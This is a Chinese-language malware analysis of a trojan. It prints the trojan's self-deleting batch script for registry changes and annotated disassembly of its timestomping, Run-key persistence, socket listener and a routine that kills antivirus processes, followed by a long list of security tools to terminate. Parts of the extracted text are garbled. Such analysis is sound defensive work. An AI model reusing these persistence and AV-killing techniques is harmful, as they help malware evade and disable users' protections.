[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>%temp%\1.reg Echo "AutoShareWks"=dword: >>%temp%\1.reg Echo "AutoShareServer"=dword: >>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]>>%temp%\1.reg Echo "NameServer"="">>%temp%\1.reg Echo "ForwardBroadcasts"=dword: >>%temp%\1.reg Echo "IPEnableRouter"=dword: >>%temp%\1.reg Echo "Domain"="">>%temp%\1.reg Echo "SearchList"="">>%temp%\1.reg Echo "UseDomainNameDevolution"=dword: >>%temp%\1.reg Echo "EnableICMPRedirect"=dword: >>%temp%\1.reg Echo "DeadGWDetectDefault"=dword: >>%temp%\1.reg Echo "DontAddDefaultGatewayDefault"=dword: >>%temp%\1.reg Echo "EnableSecurityFilters"=dword: >>%temp%\1.reg
14 Echo "AllowUnqualifiedQuery"=dword: >>%temp%\1.reg Echo "PrioritizeRecordData"=dword: >>%temp%\1.reg Echo "TCP1320Opts"=dword: >>%temp%\1.reg Echo "KeepAliveTime"=dword: >>%temp%\1.reg Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\1.reg Echo "BcastNameQueryCount"=dword: >>%temp%\1.reg Echo "CacheTimeout"=dword:0000ea60>>%temp%\1.reg Echo "Size/Small/Medium/Large"=dword: >>%temp%\1.reg Echo "LargeBufferSize"=dword: >>%temp%\1.reg Echo "SynAckProtect"=dword: >>%temp%\1.reg Echo "PerformRouterDiscovery"=dword: >>%temp%\1.reg Echo "EnablePMTUBHDetect"=dword: >>%temp%\1.reg Echo "FastSendDatagramThreshold "=dword: >>%temp%\1.reg Echo "StandardAddressLength "=dword: >>%temp%\1.reg Echo "DefaultReceiveWindow "=dword: >>%temp%\1.reg Echo "DefaultSendWindow"=dword: >>%temp%\1.reg Echo "BufferMultiplier"=dword: >>%temp%\1.reg Echo "PriorityBoost"=dword: >>%temp%\1.reg Echo "IrpStackSize"=dword: >>%temp%\1.reg Echo "IgnorePushBitOnReceives"=dword: >>%temp%\1.reg Echo "DisableAddressSharing"=dword: >>%temp%\1.reg Echo "AllowUserRawAccess"=dword: >>%temp%\1.reg Echo "DisableRawSecurity"=dword: >>%temp%\1.reg Echo "DynamicBacklogGrowthDelta"=dword: >>%temp%\1.reg Echo "FastCopyReceiveThreshold"=dword: >>%temp%\1.reg Echo "LargeBufferListDepth"=dword: a>>%temp%\1.reg Echo "MaxActiveTransmitFileCount"=dword: >>%temp%\1.reg Echo "MaxFastTransmit"=dword: >>%temp%\1.reg Echo "OverheadChargeGranularity"=dword: >>%temp%\1.reg Echo "SmallBufferListDepth"=dword: >>%temp%\1.reg Echo "SmallerBufferSize"=dword: >>%temp%\1.reg Echo "TransmitWorker"=dword: >>%temp%\1.reg Echo =hex(7):31,00,00,00,32,00,00,00,32,00,00,00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\1.reg Echo "DefaultRegistrationTTL"=dword: >>%temp%\1.reg Echo "DisableReplaceAddressesInConflicts"=dword: >>%temp%\1.reg Echo "DisableReverseAddressRegistrations"=dword: >>%temp%\1.reg Echo "UpdateSecurityLevel "=dword: >>%temp%\1.reg Echo "DisjointNameSpace"=dword: >>%temp%\1.reg Echo "QueryIpMatching"=dword: >>%temp%\1.reg Echo "NoNameReleaseOnDemand"=dword: >>%temp%\1.reg Echo "EnableDeadGWDetect"=dword: >>%temp%\1.reg Echo "EnableFastRouteLookup"=dword: >>%temp%\1.reg Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\1.reg Echo "MaxHashTableSize"=dword: >>%temp%\1.reg Echo "SackOpts"=dword: >>%temp%\1.reg Echo "Tcp1323Opts"=dword: >>%temp%\1.reg Echo "TcpMaxDupAcks"=dword: >>%temp%\1.reg Echo "TcpRecvSegmentSize"=dword: >>%temp%\1.reg Echo "TcpSendSegmentSize"=dword: >>%temp%\1.reg Echo "TcpWindowSize"=dword:0007d200>>%temp%\1.reg Echo "DefaultTTL"=dword: >>%temp%\1.reg "DNSQueryTimeouts"
15 Echo "TcpMaxHalfOpen"=dword: b>>%temp%\1.reg Echo "TcpMaxHalfOpenRetried"=dword: >>%temp%\1.reg Echo "TcpTimedWaitDelay"=dword: >>%temp%\1.reg Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\1.reg Echo "FFPControlFlags"=dword: >>%temp%\1.reg Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\1.reg Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\1.reg Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\1.reg Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\1.reg Echo "EnablePMTUDiscovery"=dword: >>%temp%\1.reg Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]>>%temp%\1.reg Echo "MaxConnectionsPer1_0Server"=dword: >>%temp%\1.reg Echo "MaxConnectionsPerServer"=dword: >>%temp%\1.reg Echo.>>%temp%\1.reg START /WAIT REGEDIT /S %temp%\1.reg DEL %temp%\1.reg DEL %0 大致内容为创建服务, 实现自启动, 修改连接的最大连接数, 修改下载线程, 修改共享 修改注册表关联, 使之无法打开 二 修改 winlogin.exe 文件时间 : 00409DC0 / 55 push ebp 00409DC1. 8BEC mov ebp,esp 00409DC3. 81EC 1C sub esp,11c 00409DC9. 53 push ebx 00409DCA. 56 push esi 00409DCB. 33F6 xor esi,esi 00409DCD. 57 push edi 00409DCE. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11c] 00409DD4. 56 push esi 00409DD5. 50 push eax 00409DD push DDB. 56 push esi 00409DDC. 68 A89F4200 push FA8 ; ASCII "explorer.exe" 00409DE1. 56 push esi 00409DE2. FF15 145B4400 call dword ptr ds:[445b14] ; kernel32.searchpatha 00409DE8. 85C0 test eax,eax 00409DEA je short E5F 00409DEC. BF mov edi, DF1. 56 push esi ; /htemplatefile => NULL 00409DF2. 57 push edi ; Attributes => NORMAL 00409DF3. 6A 03 push 3 ; Mode = OPEN_EXISTING 00409DF5. 56 push esi ; psecurity => NULL 00409DF6. 8B mov esi,dword ptr ds:[<&kernel32.createfilea>] ; kernel32.createfilea 00409DFC. 6A 01 push 1 ; ShareMode = FILE_SHARE_READ 00409DFE. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11c] ; 00409E push ; Access =
16 GENERIC_READ 00409E push eax ; FileName 00409E0A. FFD6 call esi ; \CreateFileA 00409E0C. 8BD8 mov ebx,eax 00409E0E. 83FB FF cmp ebx, E C je short E5F 00409E13. 8D45 E8 lea eax,dword ptr ss:[ebp-18] 00409E push eax ; /plastwrite 00409E17. 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; 00409E1A. 50 push eax ; plastaccess 00409E1B. 8D45 F0 lea eax,dword ptr ss:[ebp-10] ; 00409E1E. 50 push eax ; pcreationtime 00409E1F. 53 push ebx ; hfile 00409E20. FF call dword ptr ds:[<&kernel32.getfiletime>] ; \ 得到 exeplorer.exe 时间 00409E push ebx ; /hobject 00409E27. 8B1D 6C mov ebx,dword ptr ds:[<&kernel32.closehandle>] ; kernel32.closehandle 00409E2D. FFD3 call ebx ; \CloseHandle 00409E2F. 6A 00 push 0 ; /htemplatefile = NULL 00409E push edi ; Attributes => NORMAL 00409E32. 6A 03 push 3 ; Mode = OPEN_EXISTING 00409E34. 6A 00 push 0 ; psecurity = NULL 00409E36. 6A 02 push 2 ; ShareMode = FILE_SHARE_WRITE 00409E push ; Access = GENERIC_WRITE 00409E3D. FF75 08 push dword ptr ss:[ebp+8] ; FileName 00409E40. FFD6 call esi ; \CreateFileA 00409E42. 8BF0 mov esi,eax 00409E44. 83FE FF cmp esi, E je short E5F 00409E49. 8D45 E8 lea eax,dword ptr ss:[ebp-18] 00409E4C. 50 push eax ; /plastwrite 00409E4D. 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; 00409E push eax ; plastaccess 00409E51. 8D45 F0 lea eax,dword ptr ss:[ebp-10] ; 00409E push eax ; pcreationtime 00409E push esi ; hfile 00409E56. FF call dword ptr ds:[<&kernel32.setfiletime>] ; \ 设置成一样的时间 00409E5C. 56 push esi ; /hobject 00409E5D. FFD3 call ebx ; \CloseHandle 00409E5F > 5F pop edi 00409E60. 5E pop esi 00409E61. 5B pop ebx 00409E62. C9 leave 00409E63 \. C3 retn 三 创建注册表, 实现自启动 0040B485 / 55 push ebp 0040B486. 8BEC mov ebp,esp 0040B push ecx 0040B push ebx
17 0040B48A. 56 push esi 0040B48B. 57 push edi 0040B48C. BF E0BD4200 mov edi,3.0042bde0 0040B F6 xor esi,esi 0040B493. BB 24D54200 mov ebx,3.0042d524 ; ASCII "Adsl Not-A-Virus" 0040B498 > 8D45 FC /lea eax,dword ptr ss:[ebp-4] 0040B49B. 56 push esi 0040B49C. 50 push eax 0040B49D. 56 push esi 0040B49E. 68 3F000F00 push 0F003F 0040B4A3. 56 push esi 0040B4A4. 56 push esi 0040B4A5. 56 push esi 0040B4A6. FF77 04 push dword ptr ds:[edi+4] 0040B4A9. FF37 push dword ptr ds:[edi] 0040B4AB. FF15 0C5A4400 call dword ptr ds:[445a0c] ; advapi32.regcreatekeyexa 0040B4B cmp dword ptr ss:[ebp+8],esi ; 创建注册表 0040B4B C je short B4D2 0040B4B6. FF75 08 push dword ptr ss:[ebp+8] 0040B4B9. E8 82C10000 call B4BE. 59 pop ecx 0040B4BF. 50 push eax 0040B4C0. FF75 08 push dword ptr ss:[ebp+8] 0040B4C3. 6A 01 push B4C5. 56 push esi 0040B4C6. 53 push ebx 0040B4C7. FF75 FC push dword ptr ss:[ebp-4] 0040B4CA. FF15 7C5A4400 call dword ptr ds:[445a7c] ; advapi32.regsetvalueexa 0040B4D0. EB 0A jmp short B4DC ; 设置注册表值 0040B4D2 > 53 push ebx 0040B4D3. FF75 FC push dword ptr ss:[ebp-4] 0040B4D6. FF15 C call dword ptr ds:[4459c4] ; advapi32.regdeletevaluea 0040B4DC > FF75 FC push dword ptr ss:[ebp-4] ; 删除注册表值 0040B4DF. FF15 345A4400 call dword ptr ds:[445a34] ; advapi32.regclosekey 0040B4E5. 83C7 08 add edi,8 ; 关闭注册表 0040B4E8. 81FF F8BD4200 cmp edi,3.0042bdf8 0040B4EE.^ 7C A8 \jl short B498 ; 继续处理下个注册表项 0040B4F0. 5F pop edi 0040B4F1. 5E pop esi 0040B4F2. 5B pop ebx 0040B4F3. C9 leave 0040B4F4 \. C3 retn 0040B4F5 > FF push dword ptr ss:[esp+4] 0040B4F9. E8 87FFFFFF call B B4FE. 59 pop ecx 0040B4FF. FF35 D8BD4200 push dword ptr ds:[42bdd8] ; /Timeout = 120. ms 0040B505. FF15 5C call dword ptr ds:[<&kernel32.sleep>] ; \Sleep 0040B50B.^ EB E8 jmp short B4F5 0040B50D /. 8B mov eax,dword ptr ss:[esp+8]
18 0040B511. 8B mov edx,dword ptr ss:[esp+4] 0040B push esi 0040B CE FF or esi,ffffffff 0040B C0 test eax,eax 0040B51B je short B B51D. 53 push ebx 0040B51E. 57 push edi 0040B51F. 8D38 lea edi,dword ptr ds:[eax] 0040B521. B9 FF mov ecx,0ff 0040B526 > 8A02 /mov al,byte ptr ds:[edx] 0040B528. 8BDE mov ebx,esi 0040B52A. 23C1 and eax,ecx 0040B52C. 23D9 and ebx,ecx 0040B52E. 33C3 xor eax,ebx 0040B530. C1EE 08 shr esi,8 0040B533. 8B mov eax,dword ptr ds:[eax* ] 0040B53A. 33F0 xor esi,eax 0040B53C. 42 inc edx 0040B53D. 4F dec edi 0040B53E.^ 75 E6 \jnz short B B540. 5F pop edi 0040B541. 5B pop ebx 0040B542 > 8BC6 mov eax,esi 0040B544. 5E pop esi 0040B545. F7D0 not eax 0040B547 \. C3 retn 此过程创建的注册表项为下面 3 个 : (1):Software\Microsoft\Windows\CurrentVersion\Run (2):Software\Microsoft\Windows\CurrentVersion\RunServices (3):Software\Microsoft\OLE 此目的为实现木马的开机自启动 四 连接远程主机, 并实现相应的操作 0040C917 /. 55 push ebp 0040C918. 8BEC mov ebp,esp 0040C91A. 81EC sub esp, C push ebx 0040C push esi 0040C push edi 0040C923. 6A 10 push C925. 5F pop edi 0040C F6 xor esi,esi 0040C push edi 0040C929. 8D45 E4 lea eax,dword ptr ss:[ebp-1c] 0040C92C. 56 push esi 0040C92D. 50 push eax 0040C92E F8 mov dword ptr ss:[ebp-8],esi 0040C931. E8 8AA50000 call EC0 0040C C4 0C add esp,0c
19 0040C :C745 E mov word ptr ss:[ebp-1c],2 0040C93F. 6A 71 push C941. FF15 585A4400 call dword ptr ds:[445a58] ; ws2_32.ntohs 0040C push esi 0040C948. 6A 01 push C94A. 6A 02 push C94C. 66:8945 E6 mov word ptr ss:[ebp-1a],ax 0040C E8 mov dword ptr ss:[ebp-18],esi 0040C953. FF15 D85A4400 call dword ptr ds:[445ad8] ; ws2_32.socket 0040C959. 8BD8 mov ebx,eax 0040C95B. 83FB FF cmp ebx, C95E. 0F je CA C964. 8B45 08 mov eax,dword ptr ss:[ebp+8] 0040C push edi 0040C C imul eax,eax, C96E BCB44400 mov dword ptr ds:[eax+44b4bc],ebx 0040C974. 8D45 E4 lea eax,dword ptr ss:[ebp-1c] 0040C push eax 0040C push ebx 0040C979. FF15 845A4400 call dword ptr ds:[445a84] ; ws2_32.bind 0040C97F. 83F8 FF cmp eax,-1 ; 连接远程主机 0040C982. 0F84 F je CA C988. 6A 05 push C98A. 53 push ebx 0040C98B. FF15 805A4400 call dword ptr ds:[445a80] ; ws2_32.listen 0040C F8 FF cmp eax,-1 ; 开始监听 0040C994. 0F84 DE je CA C99A. 897D F4 mov dword ptr ss:[ebp-c],edi 0040C99D. BF mov edi, C9A2 > 8D45 F4 /lea eax,dword ptr ss:[ebp-c] 0040C9A5. 50 push eax 0040C9A6. 8D45 D4 lea eax,dword ptr ss:[ebp-2c] 0040C9A9. 50 push eax 0040C9AA. 53 push ebx 0040C9AB. FF15 EC5A4400 call dword ptr ds:[445aec] ; ws2_32.accept 0040C9B1. 83F8 FF cmp eax,-1 ; 开始接收 0040C9B FC mov dword ptr ss:[ebp-4],eax 0040C9B7. 0F84 B je CA C9BD. 0FB745 D6 movzx eax,word ptr ss:[ebp-2a] 0040C9C1. 50 push eax 0040C9C2. FF75 D8 push dword ptr ss:[ebp-28] 0040C9C5. FF15 E45A4400 call dword ptr ds:[445ae4] ; ws2_32.inet_ntoa 0040C9CB. 50 push eax ; IP 地址 : C9CC. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] 0040C9D C54200 push C C9D7. 50 push eax 0040C9D8. E8 68A40000 call E C9DD. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] 0040C9E3. 50 push eax 0040C9E4. E8 8DE8FFFF call B C9E9. 83C4 14 add esp,14
20 0040C9EC. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] 0040C9F2. 56 push esi 0040C9F3. 57 push edi 0040C9F4. 50 push eax 0040C9F5. FF75 FC push dword ptr ss:[ebp-4] 0040C9F8. FF15 705A4400 call dword ptr ds:[445a70] ; ws2_32.recv 0040C9FE. 83F8 FF cmp eax,-1 ; 接收数据 0040CA01.^ 74 9F je short C9A2 0040CA03. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] 0040CA push esi 0040CA0A. 50 push eax 0040CA0B. E8 9CD0FFFF call AAC 0040CA10. 6A 0C push 0C 0040CA12. 8D45 C8 lea eax,dword ptr ss:[ebp-38] 0040CA push esi 0040CA push eax 0040CA17. E8 A4A40000 call EC0 0040CA1C. 56 push esi 0040CA1D. 56 push esi 0040CA1E. 8D45 C8 lea eax,dword ptr ss:[ebp-38] 0040CA21. 6A 02 push CA push eax 0040CA24. E call D4D 0040CA push eax 0040CA2A C54200 push C570 ; ASCII " : USERID : UNIX : %s " 0040CA2F. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] 0040CA push edi 0040CA push eax 0040CA37. E8 7EA90000 call BA 0040CA3C. 83C4 34 add esp, CA3F. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] 0040CA push esi 0040CA push eax 0040CA47. E8 F4AB0000 call CA4C. 59 pop ecx 0040CA4D. 50 push eax 0040CA4E. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] 0040CA push eax 0040CA55. FF75 FC push dword ptr ss:[ebp-4] 0040CA58. FF15 A85A4400 call dword ptr ds:[445aa8] ; ws2_32.send 0040CA5E. 83F8 FF cmp eax, CA61.^ 0F84 3BFFFFFF je C9A2 0040CA67. C745 F mov dword ptr ss:[ebp-8],1 0040CA6E.^ E9 2FFFFFFF \jmp C9A2 0040CA73 > 3975 F8 cmp dword ptr ss:[ebp-8],esi 0040CA jnz short CA9F 0040CA78 > FF15 EC call dword ptr ds:[4459ec] ; ws2_32.wsagetlasterror 0040CA7E. 50 push eax 0040CA7F. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238]
21 0040CA CC54200 push C52C 0040CA8A. 50 push eax 0040CA8B. E8 B5A30000 call E CA90. 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] 0040CA push eax 0040CA97. E8 DAE7FFFF call B CA9C. 83C4 10 add esp, CA9F > 53 push ebx 0040CAA0. FF15 F05A4400 call dword ptr ds:[445af0] ; ws2_32.closesocket 0040CAA6. FF75 FC push dword ptr ss:[ebp-4] 0040CAA9. FF15 F05A4400 call dword ptr ds:[445af0] ; ws2_32.closesocket 0040CAAF. FF75 08 push dword ptr ss:[ebp+8] 0040CAB2. E8 56A10000 call C0D 0040CAB7. 59 pop ecx 0040CAB8. 56 push esi ; /ExitCode 0040CAB9 \. FF15 4C call dword ptr ds:[<&kernel32.exitthread>] ; \ExitThread 五 查杀目标的进程 push esi ; 创建每 30 秒杀目标进 程的线程 F6 xor esi,esi > 6A 01 push B. 56 push esi C. 56 push esi D. 56 push esi E. 56 push esi F. 56 push esi E8 ADFCFFFF call E2 ; 关键 CALL C4 18 add esp, FF35 A86D4300 push dword ptr ds:[436da8] ; /Timeout = ms E. FF15 5C call dword ptr ds:[<&kernel32.sleep>] ; \Sleep ^ EB E3 jmp short E2 / 55 push ebp E3. 8BEC mov ebp,esp E5. 81EC sub esp, EB. 53 push ebx EC. 56 push esi ED. 57 push edi EE. 6A 49 push F0. 33DB xor ebx,ebx F2. 59 pop ecx F3. 33C0 xor eax,eax F5. 391D 785A4400 cmp dword ptr ds:[445a78],ebx FB. 8DBD D4FEFFFF lea edi,dword ptr ss:[ebp-12c] D D0FEFFFF mov dword ptr ss:[ebp-130],ebx F3:AB rep stos dword ptr es:[edi] B mov ecx, E. 8DBD B0FCFFFF lea edi,dword ptr ss:[ebp-350] D ACFCFFFF mov dword ptr ss:[ebp-354],ebx A. F3:AB rep stos dword ptr es:[edi]
22 C. 0F84 BF je E D 5C5A4400 cmp dword ptr ds:[445a5c],ebx F84 B je E E. 391D cmp dword ptr ds:[445978],ebx F84 A je E A. 6A 01 push C. 68 D push D8 ; SeDebugPrivilege E8 31FFFFFF call ; 提升进程权限 pop ecx pop ecx push ebx A 0F push 0F B. FF15 785A4400 call dword ptr ds:[445a78] ; kernel32.createtoolhelp32snapshot BF8 mov edi,eax ; 枚举进程 FF FF cmp edi, D F8 mov dword ptr ss:[ebp-8],edi F je D F. 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-130] C785 D0FEFFFF 2801>mov dword ptr ss:[ebp-130], F. 50 push eax push edi FF15 5C5A4400 call dword ptr ds:[445a5c] ; kernel32.process32first B35 6C mov esi,dword ptr ds:[<&kernel32.closehandle>] ; kernel32.closehandle D. 85C0 test eax,eax F. 0F84 4A je CF D85 D0FEFFFF lea eax,dword ptr ss:[ebp-130] B. 50 push eax C. 57 push edi D. FF call dword ptr ds:[445978] ; kernel32.process32next C0 test eax,eax F je CF B. 8B3D E mov edi,dword ptr ds:[<&kernel32.openprocess>] ; kernel32.openprocess A1. BB FF0F1F00 mov ebx,1f0fff A6 > 33C0 /xor eax,eax A cmp dword ptr ss:[ebp+18],eax AB je short D AD. C745 FC AC6D4300 mov dword ptr ss:[ebp-4], dac ; ALOGSERV.EXE B4 > 8B45 FC /mov eax,dword ptr ss:[ebp-4] B7. FF30 push dword ptr ds:[eax] ; /String2 = "ALERTSVC.EXE" B9. 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10c] ; BF. 50 push eax ; String C0. FF call dword ptr ds:[<&kernel32.lstrcmpia>] ; \lstrcmpia C6. 85C0 test eax,eax ; 比较枚举的进程是否为 要结束的进程 C je short DC CA FC 04 add dword ptr ss:[ebp-4], CE. 817D FC 6C cmp dword ptr ss:[ebp-4], c ; ASCII "i11r54n4.exe" D5.^ 7C DD \jl short B D7. E9 D jmp B DC > FFB5 D8FEFFFF push dword ptr ss:[ebp-128]
23 004146E2. 6A 00 push E4. 53 push ebx E5. FFD7 call edi E7. 85C0 test eax,eax E FC mov dword ptr ss:[ebp-4],eax EC. 0F84 C je B F2. 6A 00 push 0 ; /ExitCode = F4. 50 push eax ; hprocess F5. FF call dword ptr ds:[<&kernel32.terminateprocess>] ; \TerminateProcess FB. 85C0 test eax,eax FD. 0F85 B jnz B > FF75 FC push dword ptr ss:[ebp-4] FFD6 call esi E9 A jmp B D > cmp dword ptr ss:[ebp+14],eax F85 8A jnz A C cmp dword ptr ss:[ebp+c],eax F je B F. FFB5 D8FEFFFF push dword ptr ss:[ebp-128] A 08 push FF15 785A4400 call dword ptr ds:[445a78] ; kernel32.createtoolhelp32snapshot D. 837D 1C 00 cmp dword ptr ss:[ebp+1c], FC mov dword ptr ss:[ebp-4],eax C785 ACFCFFFF 2402> mov dword ptr ss:[ebp-354], E je short D8D ACFCFFFF lea ecx,dword ptr ss:[ebp-354] push ecx push eax FF call dword ptr ds:[445924] ; kernel32.module32first E. FFB5 D8FEFFFF push dword ptr ss:[ebp-128] C0 test eax,eax E je short D85 CCFDFFFF lea eax,dword ptr ss:[ebp-234] E. EB 0C jmp short C > FFB5 D8FEFFFF push dword ptr ss:[ebp-128] > 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10c] C > 50 push eax D. 8D85 ACFAFFFF lea eax,dword ptr ss:[ebp-554] push ; %s (%d) push eax E8 C call E E. 83C4 10 add esp, D85 ACFAFFFF lea eax,dword ptr ss:[ebp-554] A 01 push FF75 10 push dword ptr ss:[ebp+10] C. 50 push eax D. FF75 0C push dword ptr ss:[ebp+c] FF75 08 push dword ptr ss:[ebp+8] E8 7083FFFF call CB C4 14 add esp, B.^ E9 63FFFFFF jmp
24 004147A0 > FF75 14 push dword ptr ss:[ebp+14] A3. 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10c] A9. 50 push eax AA. E8 B12A0000 call AF. 59 pop ecx B0. 85C0 test eax,eax B2. 59 pop ecx B je short E B5 > 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-130] BB. 50 push eax BC. FF75 F8 push dword ptr ss:[ebp-8] BF. FF call dword ptr ds:[445978] ; kernel32.process32next C5. 85C0 test eax,eax C7.^ 0F85 D9FEFFFF \jnz A CD. 33DB xor ebx,ebx CF > FF75 F8 push dword ptr ss:[ebp-8] D2. FFD6 call esi D4 > 53 push ebx D5. 68 D push D8 ; SeDebugPrivilege DA. E8 98FDFFFF call DF. 59 pop ecx E0. 59 pop ecx E1 > 33C0 xor eax,eax E3 > 5F pop edi E4. 5E pop esi E5. 5B pop ebx E6. C9 leave E7. C3 retn E8 > FFB5 D8FEFFFF push dword ptr ss:[ebp-128] EE. 6A 00 push F0. 53 push ebx F1. FFD7 call edi F3. FF75 F8 push dword ptr ss:[ebp-8] F6. 8BF8 mov edi,eax F8. FFD6 call esi FA. 6A 00 push 0 ; /ExitCode = FC. 57 push edi ; hprocess FD. FF call dword ptr ds:[<&kernel32.terminateprocess>] ; \TerminateProcess C0 test eax,eax jnz short C push edi FFD6 call esi A.^ EB D5 jmp short E C > 6A 01 push E. 58 pop eax F \.^ EB D2 jmp short E3 要结束的进程大约有这些 : r54n4.exe,irun4.exe,d3dupdate.exe,rate.exe,ssate.exe,winsys.exe,winupd.exe,sysmonxp.exe,bbeagle.exe,penis32.exe, mscvb32.exe, sysinfo.exe, PandaAVEngine.exe, F-AGOBOT.EXE, HIJACKTHIS.EXE, _AVPM.EXE, _AVPCC.EXE, _AVP32.EXE, ZONEALARM.EXE, ZONALM2601.EXE, ZATUTOR.EXE, ZAPSETUP3001.EXE, ZAPRO.EXE, XPF202EN.EXE,WYVERNWORKSFIREWALL.EXE,WUPDT.EXE,WUPDATER.EXE,WSBGATE.EXE,WRCTRL.EXE, WRADMIN.EXE,WNT.EXE,WNAD.EXE,WKUFIND.EXE,WINUPDATE.EXE,WINTSK32.EXE,WINSTART001.EXE,
25 WINSTART.EXE,WINSSK32.EXE,WINSERVN.EXE,WINRECON.EXE,WINPPR32.EXE,WINNET.EXE,WINMAIN.EXE, WINLOGIN.EXE,WININITX.EXE,WININIT.EXE,WININETD.EXE,WINDOWS.EXE,WINDOW.EXE,WINACTIVE.EXE, WIN32US.EXE, WIN32.EXE, WIN-BUGSFIX.EXE, WIMMUN32.EXE, WHOSWATCHINGME.EXE, WGFE95.EXE, WFINDV32.EXE,WEBTRAP.EXE,WEBSCANX.EXE,WEBDAV.EXE,WATCHDOG.EXE,W9X.EXE,W32DSM89.EXE, VSWINPERSE.EXE,VSWINNTSE.EXE,VSWIN9XE.EXE,VSSTAT.EXE,VSMON.EXE,VSMAIN.EXE,VSISETUP.EXE, VSHWIN32.EXE,VSECOMR.EXE,VSCHED.EXE,VSCENU6.02D30.EXE,VSCAN40.EXE,VPTRAY.EXE,VPFW30S.EXE, VPC42.EXE,VPC32.EXE,VNPC3000.EXE,VNLAN300.EXE,VIRUSMDPERSONALFIREWALL.EXE,VIR-HELP.EXE, VFSETUP.EXE, VETTRAY.EXE, VET95.EXE, VET32.EXE, VCSETUP.EXE, VBWINNTW.EXE, VBWIN9X.EXE, VBUST.EXE, VBCONS.EXE, VBCMSERV.EXE, UTPOST.EXE, UPGRAD.EXE, UPDATE.EXE, UPDAT.EXE, UNDOBOOT.EXE,TVTMD.EXE,TVMD.EXE,TSADBOT.EXE,TROJANTRAP3.EXE,TRJSETUP.EXE,TRJSCAN.EXE, TRICKLER.EXE, TRACERT.EXE, TITANINXP.EXE, TITANIN.EXE, TGBOB.EXE, TFAK5.EXE, TFAK.EXE, TEEKIDS.EXE,TDS2-NT.EXE,TDS2-98.EXE,TDS-3.EXE,TCM.EXE,TCA.EXE,TC.EXE,TBSCAN.EXE,TAUMON.EXE, TASKMON.EXE, TASKMO.EXE,TASKMG.EXE,SYSUPD.EXE,SYSTEM32.EXE,SYSTEM.EXE,SYSEDIT.EXE, SYMTRAY.EXE,SYMPROXYSVC.EXE,SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE,SWEEP95.EXE,SVSHOST.EXE, SVCHOSTS.EXE,SVCHOSTC.EXE,SVC.EXE,SUPPORTER5.EXE,SUPPORT.EXE,SUPFTRL.EXE,STCLOADER.EXE, START.EXE, ST2.EXE, SSG_4104.EXE, SSGRATE.EXE, SS3EDIT.EXE, SRNG.EXE, SREXE.EXE, SPYXX.EXE, SPOOLSV32.EXE,SPOOLCV.EXE,SPOLER.EXE,SPHINX.EXE,SPF.EXE,SPERM.EXE,SOFI.EXE,SOAP.EXE, SMSS32.EXE, SMS.EXE, SMC.EXE, SHOWBEHIND.EXE, SHN.EXE, SHELLSPYINSTALL.EXE, SH.EXE, SGSSFW32.EXE, SFC.EXE, SETUP_FLOWPROTECTOR_US.EXE, SETUPVAMEEVAL.EXE, SERVLCES.EXE, SERVLCE.EXE,SERVICE.EXE,SERV95.EXE,SD.EXE,SCVHOST.EXE,SCRSVR.EXE,SCRSCAN.EXE,SCANPM.EXE, SCAN95.EXE,SCAN32.EXE,SCAM32.EXE,SC.EXE,SBSERV.EXE,SAVENOW.EXE,SAVE.EXE,SAHAGENT.EXE, SAFEWEB.EXE, RUXDLL32.EXE, RUNDLL16.EXE, RUNDLL.EXE, RUN32DLL.EXE, RULAUNCH.EXE, RTVSCN95.EXE,RTVSCAN.EXE,RSHELL.EXE,RRGUARD.EXE,RESCUE32.EXE,RESCUE.EXE,REGEDT32.EXE, REGEDIT.EXE, REGED.EXE, REALMON.EXE, RCSYNC.EXE, RB32.EXE, RAY.EXE, RAV8WIN32ENG.EXE, RAV7WIN.EXE,RAV7.EXE,RAPAPP.EXE,QSERVER.EXE,QCONSOLE.EXE,PVIEW95.EXE,PUSSY.EXE,PURGE.EXE, PSPF.EXE, PROTECTX.EXE, PROPORT.EXE, PROGRAMAUDITOR.EXE, PROCEXPLORERV1.0.EXE, PROCESSMONITOR.EXE, PROCDUMP.EXE, PRMVR.EXE, PRMT.EXE, PRIZESURFER.EXE, PPVSTOP.EXE, PPTBC.EXE,PPINUPDT.EXE,POWERSCAN.EXE,PORTMONITOR.EXE,PORTDETECTIVE.EXE,POPSCAN.EXE, POPROXY.EXE,POP3TRAP.EXE,PLATIN.EXE,PINGSCAN.EXE,PGMONITR.EXE,PFWADMIN.EXE,PF2.EXE, PERSWF.EXE, PERSFW.EXE, PERISCOPE.EXE, PENIS.EXE, PDSETUP.EXE, PCSCAN.EXE, PCIP10117_0.EXE, PCFWALLICON.EXE, PCDSETUP.EXE, PCCWIN98.EXE, PCCWIN97.EXE, PCCNTMON.EXE, PCCIOMON.EXE, 